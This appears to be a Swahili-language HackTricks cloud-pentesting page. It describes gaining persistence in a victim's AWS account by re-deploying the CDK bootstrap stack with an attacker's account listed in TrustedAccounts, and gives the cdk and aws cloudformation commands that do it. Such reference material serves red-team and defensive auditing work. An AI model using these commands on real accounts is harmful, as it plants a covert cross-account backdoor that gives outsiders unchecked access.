AWS - Cloudformation Persistence

Reading time: 2 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

CloudFormation

Kwa maelezo zaidi, tembelea:

AWS - CloudFormation & Codestar Enum

CDK Bootstrap Stack

AWS CDK inapeleka CFN stack inayoitwa CDKToolkit. Stack hii inasaidia parameter TrustedAccounts ambayo inaruhusu akaunti za nje kupeleka miradi ya CDK kwenye akaunti ya mwathirika. Mshambuliaji anaweza kutumia hii kuwapa ufikiaji usio na kikomo kwenye akaunti ya mwathirika, ama kwa kutumia AWS cli kupeleka tena stack na parameters, au AWS CDK cli.

bash
# CDK
cdk bootstrap --trust 1234567890

# AWS CLI
aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks